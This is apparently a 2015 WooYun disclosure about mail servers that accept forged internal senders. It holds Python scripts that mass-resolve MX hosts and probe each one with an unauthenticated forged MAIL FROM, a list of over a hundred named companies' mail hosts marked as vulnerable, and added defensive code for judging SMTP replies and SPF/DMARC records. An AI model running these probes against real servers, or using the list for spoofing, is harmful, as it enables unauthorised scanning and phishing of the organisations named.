
Many vendors' mail systems are misconfigured, allowing the sender to be forged

2015-04-24 04:40

Mail servers are misconfigured and do not enable verification, so the sender address can be forged, which affects the enterprise's internal information security. I wrote two scripts and ran them against the vendors listed on WooYun.



The script below resolves the mail server hostnames or IPs of all the vendors.

Code:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Resolve the MX hosts of every domain in yuming.txt and append them to mail.txt.

import time
from multiprocessing import Pool

import dns.resolver   # dnspython; resolve() needs dnspython >= 2.0

# MX hosts of hosted mail providers are skipped
WHITE = ["GOOGLEMAIL.COM", "GOOGLE.COM", "googlemail.com", "qq.com", "google.com", "163.com", "126.com"]


def white(s):
    """True unless the MX host belongs to a provider in WHITE."""
    for w in WHITE:
        if w in s:
            return False
    return True


def q(ym):
    """Look up the MX records of one domain; return (domain, [hosts]) or (domain, None) on error."""
    try:
        if ym.startswith("www."):
            ym = ym.split("www.", 1)[1]
        if ym.count(".") > 1:
            # keep only the registrable domain (last two labels)
            ym = ym.split(".")[-2] + "." + ym.split(".")[-1]
        resolver = dns.resolver.Resolver()
        resolver.timeout = 1    # per-nameserver timeout in seconds
        resolver.lifetime = 3   # total time allowed for the query
        answers = resolver.resolve(ym, "MX")
        found = []
        for rdata in answers:
            exchange = str(rdata.exchange)
            if white(exchange):
                print(exchange)
                found.append(exchange)
        return ym, found
    except Exception as e:
        print(e)
        return ym, None


if __name__ == "__main__":
    PATH = r"yuming.txt"
    start = time.time()
    with open(PATH, "r") as fp:
        domains = [line.strip() for line in fp if line.strip()]
    OK = []
    ERROR = []
    # A pool returns results to the parent; lists appended inside child
    # processes are not visible here, so the results are collected this way.
    with Pool(32) as pool:
        for ym, found in pool.imap_unordered(q, domains):
            if found is None:
                ERROR.append(ym)
            else:
                OK.extend(found)
    # write the hosts directly instead of shelling out to echo >> mail.txt
    with open("mail.txt", "a") as out:
        for host in OK:
            out.write(host + "\n")
    print(OK)
    print(ERROR)
    end = time.time()
    print(end - start)



The script below checks whether each mail server found has verification enabled, that is, whether the sender can be forged.

Code:
#!/usr/bin/env python3
# Connect to each MX host in mail.txt and check whether an envelope with an
# internal MAIL FROM / RCPT TO is accepted without any authentication.

import smtplib
import traceback
from multiprocessing import Pool

# Reply text fragments that mean the server refused the command
WHITE = ["auth", "error", "bad", "deny", "denied", "rejected"]


def white(s):
    """True unless the reply text contains one of the refusal keywords."""
    for w in WHITE:
        if w in s:
            return False
    return True


def accepted(reply):
    """smtplib returns (code, bytes); require a 250 code and no refusal keyword."""
    code, text = reply
    return code == 250 and white(text.decode("utf-8", "replace").lower())


def go(mailserver):
    """Return the host if it accepted the test envelope, else None."""
    try:
        # domain = host name minus its first label (mail.example.com -> example.com)
        yuming = mailserver[len(mailserver.split(".")[0]) + 1:]
        print(yuming)
        from_addr = "hr@" + yuming
        to_addr = "hr@" + yuming
        msg = "test"
        svr = smtplib.SMTP(mailserver, timeout=10)
        # svr.set_debuglevel(1)
        svr.helo("localhost")
        x = svr.mail(from_addr)        # MAIL FROM:<hr@domain>
        if accepted(x):
            y = svr.rcpt(to_addr)      # RCPT TO:<hr@domain>
            if accepted(y):
                print("-------------")
                print(mailserver)
                # svr.data(msg)
                svr.quit()
                return mailserver
        svr.quit()
    except Exception:
        traceback.print_exc()
    return None


if __name__ == "__main__":
    with open("mail.txt") as fp:
        servers = [m.strip().rstrip(".") for m in fp if m.strip()]
    FOUND = []
    with Pool(32) as pool:
        for host in pool.imap_unordered(go, servers):
            if host:
                FOUND.append(host)
    for host in FOUND:
        print(host)
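Deciding what a reply means from its text, as the second script does with its keyword list, misjudges refusals phrased differently and temporary failures, and an operator auditing their own gateway needs a verdict they can trust. The example below is added here and is not part of the original report: it classifies replies by the three-digit SMTP code and the RFC 3463 enhanced status code, and runs the page's keyword filter beside it over constructed replies (not captured from any server named above) to show where the two disagree.

```python
"""
Classify SMTP envelope replies by their numeric and enhanced status codes
rather than by scanning the text for refusal words.

Added example; the replies below are constructed, not captured from any
server named on this page.
"""
import re

# The page's keyword filter: a reply is treated as "accepted" unless one of
# these words occurs in its text.
PAGE_KEYWORDS = ["auth", "error", "bad", "deny", "denied", "rejected"]

# RFC 3463 enhanced status code, e.g. "5.7.1", at the start of the reply text
ENHANCED_RE = re.compile(r"^(\d)\.(\d{1,3})\.(\d{1,3})\b")

# Constructed replies in smtplib's (code, bytes) shape
SAMPLE_REPLIES = [
    (250, b"2.1.0 Ok"),
    (250, b"2.1.5 Ok"),
    (530, b"5.7.0 Authentication required"),
    (554, b"5.7.1 <hr@example.test>: Sender address rejected: not owned by user"),
    (553, b"5.7.1 sender not allowed"),
    (451, b"4.7.1 Greylisted, please try again later"),
    (550, b"5.1.1 Recipient unknown"),
]


def _text(text):
    return text.decode("utf-8", "replace") if isinstance(text, bytes) else text


def keyword_filter(text):
    """The page's heuristic: True means 'looks accepted'."""
    return not any(w in _text(text).lower() for w in PAGE_KEYWORDS)


def enhanced_status(text):
    """Return the X.Y.Z enhanced status code from the reply text, or None."""
    m = ENHANCED_RE.match(_text(text))
    return ".".join(m.groups()) if m else None


def classify(code, text):
    """
    Map one reply to 'accepted' (2xx), 'temporary' (4xx), 'auth_required'
    (530/535, or a 5.7.0 policy code that mentions authentication) or
    'rejected' (any other 5xx).
    """
    text = _text(text)
    if 200 <= code < 300:
        return "accepted"
    if 400 <= code < 500:
        return "temporary"
    status = enhanced_status(text)
    if code in (530, 535) or (status == "5.7.0" and "auth" in text.lower()):
        return "auth_required"
    return "rejected"


def compare(replies):
    """
    Run both methods over (code, text) replies.  Returns (rows, disagreements):
    rows are (code, classification, keyword_verdict); disagreements counts the
    replies where the keyword filter's accept/refuse verdict differs from the
    code-based one.
    """
    rows, disagreements = [], 0
    for code, text in replies:
        cls = classify(code, text)
        kw = keyword_filter(text)
        if (cls == "accepted") != kw:
            disagreements += 1
        rows.append((code, cls, kw))
    return rows, disagreements


if __name__ == "__main__":
    rows, bad = compare(SAMPLE_REPLIES)
    for code, cls, kw in rows:
        print(f"{code}  by code: {cls:13s}  by keyword: {'accepted' if kw else 'refused'}")
    print(f"{bad} of {len(rows)} replies misjudged by the keyword filter")
```

Over the constructed replies the keyword filter calls three refusals accepted (the 553 "not allowed", the 451 greylisting and the 550 unknown recipient), which is why a verdict should come from the code and the enhanced status, with a 4xx retried rather than counted either way.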

Proof of vulnerability:

mail.taomee.com

mail.syyx.com

mx2.ctrip.com

mail.iboxpay.com

mailgateway.jiayuan.com

tfw.qihoo.net

mgw1.wanda.cn

mx2.mail.renren.com

mx2.mail.renren.com

mx.ctrip.com

mail.51greenorange.com

mx2.ctrip.com

mail.ku6.com

mailgate2.neusoft.com

staff.178.com

mail03.meituan.com

mail.591wed.com

mgw2.wanda.cn

mx1.huawei.com

mailsrv1.lianzhong.com

mail.998.com

mail.mplife.com

smtpin.ceair.com

mail.5173.com

mail2.qmango.com

mx1.global-mail.cn

mail.jingwei.com

mxb.mailgun.org

mail.legendsec.com

spam.jsbc.com

115.182.12.87

mail.aibang.com

antispam.m18.com

webmail.17500.cn

mx2.huawei.com

mx.ctrip.com

mailx.picchealth.com

60.190.244.147

mail.uzai.com

mx.global-mail.cn

mx01.changyou.com

mail.sootoo.com

mail.ecitic.com

mail.cnmo.com

mail3.sankuai.info

mx.global-mail.cn

mx01.unionpayintl.com

mta-189.21cn.com

meg.creditease.cn

mail.chexun.com

mail.playcool.com

mx.zhaopin.com.cn

mail02.playcool.com

mail.zuche.com

smtp.huimai365.com

mx3.huawei.com

mail.rong360.com

mailmx.picchealth.com

mx1.cofco.com

mx3.mxmail.xiaomi.com

smtpgw4.chinaamc.com

mail.locojoy.com

mail.zhujiwu.com

smtpgw1.chinaamc.com

mail01.meituan.com

cs.5173.com

mx2.weiphone.com

mail.tujia.com

mx1.bianfeng.com

mail.fun.tv

121.12.162.99

tfw.qihoo.net

smtpgw2.chinaamc.com

mail2.51greenorange.com

meizuMX1.meizu.com

mx2.vancl.cn

mail.dbw.cn

mx1.mail.renren.com

smtp.nsfocus.com

oa.legendsec.com

mail.yundaex.com

dianping-com.mail.protection.partner.outlook.cn

mail.leyou.com

mxi.opera.com

mx1.global-mail.cn

mail.oschina.net

mx1.vancl.cn

mail2.founderbn.com

mail2.bitauto.com

smtpgw3.chinaamc.com

webmail.chinahr.com

mx.55tuan.com

spam.goodbabygroup.com

mail.china-sss.com

mail.tuniu.com

meizuMX2.meizu.com

qhome.3322.org

chuangxin-com.mail.protection.partner.outlook.cn

mail.99bill.com

mx1.mail.renren.com

meg.creditease.cn

mailgate.neusoft.com

cnexcbeiedg01.chinahr.com

mail.h3c.com

mail.netentsec.com

mail1.h3c.com

mail01.playcool.com

mailmx1.sinopec.com

mail3.founderbn.com

mx1.shandagames.com

mail1.h3c.com

appchina-com.mail.protection.partner.outlook.cn

exchange.chanjet.com

exchange01.chanjet.com

mail.51web.com

mx4.huawei.com

182.148.112.202

cnexcbeiedg02.chinahr.com

mx.fun.tv

mta-189.21cn.com

mx2.99bill.com

mail.h3c.com

mx1.99bill.com



Not all of the hosts above are necessarily affected, but by eye the hit rate is over 80%; I tested a dozen or so large vendors by hand and all of them were affected. Screenshots follow:

[Screenshots 1.png to 8.png and 10.png to 13.png: images not included in this text version]

Fix:

Vendors, please enable authentication.
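The fix above is a single line. Requiring SMTP authentication stops unauthenticated submission, but an inbound MX must still accept mail for its own domain from the outside, so the standard control against a forged internal sender is that receivers, the vendor's own MX included, check the sender domain's published SPF and DMARC records. The example below is added here and is not from the report: it parses constructed SPF and DMARC TXT records (made-up domains, not the real records of any vendor listed) and rates whether a forged internal sender would be rejected.

```python
"""
Judge whether a domain's published SPF and DMARC records let a receiving MTA,
including the domain's own MX, reject mail that forges an internal sender.

Added example; the TXT records below are constructed, not the real records of
any vendor on this page.
"""


def parse_spf(record):
    """
    Return (mechanisms, all_qualifier, has_redirect) for a v=spf1 record, or
    None if the record is missing or not SPF.  mechanisms is a list of
    (qualifier, mechanism) pairs; all_qualifier is '+', '-', '~', '?' or None.
    """
    if not record or not record.lower().startswith("v=spf1"):
        return None
    mechanisms, all_q, has_redirect = [], None, False
    for term in record.split()[1:]:
        qualifier = "+"                       # default qualifier is pass
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        if term.lower() == "all":
            all_q = qualifier
        elif "=" in term:                     # modifier such as redirect= or exp=
            has_redirect |= term.lower().startswith("redirect=")
        else:
            mechanisms.append((qualifier, term))
    return mechanisms, all_q, has_redirect


def parse_dmarc(record):
    """Return the tag dict of a v=DMARC1 record, or None."""
    if not record:
        return None
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags if tags.get("v", "").upper() == "DMARC1" else None


def assess(spf_record, dmarc_record):
    """
    Return (verdict, findings).  'protected': a forged sender does not pass SPF
    and DMARC tells receivers to quarantine or reject.  'partial': SPF hard-fails
    but DMARC is absent or p=none, so rejection is up to each receiver.
    'exposed': anything weaker.  DKIM is ignored: a forged message carries no
    valid signature for the domain, so it cannot rescue the DMARC result.
    """
    findings = []
    spf = parse_spf(spf_record)
    if spf is None:
        findings.append("no SPF record: receivers cannot tell forged from legitimate sending hosts")
        spf_usable, all_q = False, None
    else:
        _, all_q, has_redirect = spf
        if all_q == "+":
            findings.append("SPF ends in +all: every host on the internet is authorised")
            spf_usable = False
        elif all_q in ("~", "?"):
            findings.append(f"SPF ends in {all_q}all: forged mail only soft-fails; needs DMARC to be rejected")
            spf_usable = True
        elif all_q is None and not has_redirect:
            findings.append("SPF has no 'all' term: unlisted hosts get a neutral result")
            spf_usable = True
        else:
            spf_usable = True                 # -all, or policy delegated via redirect=

    dmarc = parse_dmarc(dmarc_record)
    policy = dmarc.get("p", "").lower() if dmarc else None
    if dmarc is None:
        findings.append("no DMARC record: SPF failures carry no instruction to receivers")
        enforced = False
    elif policy in ("quarantine", "reject"):
        enforced = True
    elif policy == "none":
        findings.append("DMARC p=none: monitoring only, forged mail is still delivered")
        enforced = False
    else:
        findings.append(f"DMARC policy {policy!r} is not valid; treated as unenforced")
        enforced = False

    if spf_usable and enforced:
        verdict = "protected"
    elif spf_usable and all_q == "-":
        verdict = "partial"
    else:
        verdict = "exposed"
    return verdict, findings


# Constructed sample records covering the main configurations
SAMPLES = {
    "good.example": ("v=spf1 ip4:203.0.113.0/24 include:_spf.mail.example -all",
                     "v=DMARC1; p=reject; rua=mailto:dmarc@good.example"),
    "hard.example": ("v=spf1 mx -all", None),
    "soft.example": ("v=spf1 mx ~all", "v=DMARC1; p=none; rua=mailto:dmarc@soft.example"),
    "open.example": ("v=spf1 +all", None),
    "none.example": (None, None),
}

if __name__ == "__main__":
    for domain, (spf, dmarc) in SAMPLES.items():
        verdict, findings = assess(spf, dmarc)
        print(f"{domain}: {verdict}")
        for finding in findings:
            print("   -", finding)
```

To use it against a live domain, fetch the TXT records of the domain and of `_dmarc.<domain>` with a resolver as the first script does for MX and pass them to `assess`; the receiving side then needs to actually evaluate SPF and DMARC on inbound mail, which is the piece a spoofable gateway is missing.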

Source: www.wooyun.org/bugs/wooyun-2015-098813
